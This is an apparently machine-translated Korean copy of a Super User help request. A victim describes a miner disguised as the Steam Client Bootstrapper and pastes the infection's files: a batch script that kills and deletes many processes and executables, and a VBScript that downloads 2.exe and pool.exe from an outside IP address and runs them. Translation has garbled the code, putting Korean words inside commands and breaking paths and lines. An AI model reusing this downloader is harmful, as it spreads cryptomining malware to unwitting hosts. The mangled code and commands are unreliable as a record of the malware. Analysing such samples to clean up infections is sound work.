창문 - 증기 클라이언트 부트 스트 래퍼를 영구적으로 제거하는 방법 - 수퍼 유저

내 작업 관리자에 다음과 같은 상황이 있습니다.

내 작업 관리자에 다음과 같은 상황이 있습니다

어떤 종류의 응용 프로그램인지 모르겠지만 설치하지 않았고 제거 할 수 없기 때문에 Steam 클라이언트 부트 스트 래퍼가 아닙니다.

이 단계를 통해 어떤 종류의 앱인지 파악하려고하면 다음과 같이하십시오.

나는 다음과 같은 것을 본다.

MS Config 유틸리티에서 secury.exe와 같은 것을 찾지 못했습니다.

파일 위치를 열면 세 개의 파일이 표시됩니다.

m.bat, b.exe, 4.vbs.

아래는 m.bat의 내용입니다.

taskkill / f / t / im secury.exe c : \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im SystemSetting.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe taskkill / fiddlet.exe taskkill / f / t / im mswc.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / fp / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / 메신저 TrustedInstaller.exe C : \ Windows \ System32 \ soiuos.exe del C : \ ProgramData \ nspl.exe C : \ ProgramData \ nsplare.exe C : \ ProgramData \ ProgramData \ MSASCui.exe del C : \ Pro C : \ ProgramData \ System.exe C : \ ProgramData \ System.exe C : \ ProgramData \ msdc.exe C : \ ProgramData \ WindowsUpgrade.exe의 C : \ ProgramData \ WinDriver.exe C : \ ProgramData \ win98.exe C : \ ProgramData \ win98.exe C : \ ProgramData \ lqrtqe.exe C : \ ProgramData \ \ svchosts.exe C : \ ProgramData \ pool1.exe del C : \ ProgramData \ pool.exe C : \ ProgramData \ pool.exe C : \ ProgramData \ C : \ ProgramData \ pool3.exe

다음가는 4.vbs :

Set xPost = CreateObject ( "Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ( "ADODB.Stream" ) sGet.Type = 1 sGet.Type = 1 sGet.Write (xPost.responseBody) sGet.SaveToFile "c : \ ProgramData \ s2.exe", 2 Set xPost = CreateObject ( "Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Set sGet = CreateObject ( "ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 CreateObject ( "WScript.Shell"). "C : \ ProgramData \ pool3.exe"를 실행하십시오. CreateObject ( "CreateObject ()"를 실행하십시오.) sGet.Write (xPost.responseBody) sGet.SaveToFile "c : \ ProgramData \ pool2.exe" "WScript.Shell"). "del C : \ ProgramData \ pool3.exe"를 실행하십시오.

secury.exe가 내 서버의 컴퓨팅 능력을 악용하는 것을 막으려면 어떻게해야합니까?

추신 : 내 컴퓨터의 Avast 전체 검사를 실행했지만 이상한 점을 발견하지 못했습니다.

Exe가 내 서버의 컴퓨팅 능력을 악용하는 것을 막으려면 어떻게해야합니까?